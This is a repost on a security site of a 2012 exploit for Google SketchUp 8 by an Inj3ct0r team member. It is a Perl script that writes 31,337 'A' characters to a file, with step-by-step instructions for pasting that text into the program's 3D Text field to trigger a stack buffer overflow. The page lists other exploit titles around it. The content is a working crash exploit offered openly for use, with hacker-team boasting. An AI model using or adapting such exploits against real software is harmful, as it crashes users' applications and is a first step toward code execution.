首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Google SketchUp 8 - Stack Based Buffer Overflow Vulnerability
来源:http://www.1337day.com 作者:NuxbieCyber 发布时间:2012-10-26  

<PRE>#!/usr/bin/perl
#
# 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0          _                   __           __       __                         1
# 1        /' \            __  /'__`\        /\ \__  /'__`\                       0
# 0       /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___               1
# 1       \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\              0
# 0          \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/               1
# 1           \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\               0
# 0            \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/               1
# 1                       \ \____/ &gt;&gt; Exploit database separated by exploit       0
# 0                        \/___/          type (local, remote, DoS, etc.)        1
# 1                                                                               0
# 0       [x] Official Website: http://www.1337day.com                            1
# 1       [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                      0
# 0                                                                               1
# 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0
# 0                  I'm NuxbieCyber Member From Inj3ct0r TEAM                    1
# 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#
# Title  : Google SketchUp 8 - Stack Based Buffer Overflow Vulnerability.
# Author : NuxbieCyber
# Link   : http://sketchup.google.com/download/
# Type   : Local.
# Risk   : Critical.
# Vendor : Google Inc.
# Version: Google SketchUp 8.

# Tested On  : Windows XP Service Pack 2 ID 32x.
# Time &amp; Date: 26 Oktober 2012 - 01:15 PM.

# Execute: perl google-su.pl
# Open with Notepad++ file BoF.txt, Select ALL , then Copy.
# After copying the whole line,
# Go To Google SketchUp --&gt; Tools --&gt; 3D Text --&gt; Place 3D Text --&gt; Paste the line into field and click Place.

my $junk = "A" x 31337 ;
 
$payload= $junk;
open(myfile,'&gt;BoF.txt');
print myfile $payload;
close(myfile);
print "cr00ted ".length($payload)." bytes\n";

# - Special Thanks:
# ...:::' 1337day - Inj3ct0r TEAM ':::...
# BoSs r0073r &amp; All 31337 Member Inj3ct0r TEAM,,,
# , And All Inj3ct0r Fans &amp; All Hacktivist,,,

# NuxbieSec

     </PRE>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Office Picture Manag
·Microsoft Office professional
·Aladdin Knowledge System Ltd.
·Apple QuickTime Player 7.7.2 D
·Aladdin Knowledge System Ltd -
·Turbo FTP Server 1.30.823 PORT
·hMailServer 5.3.3 IMAP Remote
·Oracle Database Authentication
·Microsoft Windows Help program
·ManageEngine Security Manager
·Adobe reader 10.1.4 memory cor
·Microsoft Paint 5.1 Memory Cor
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved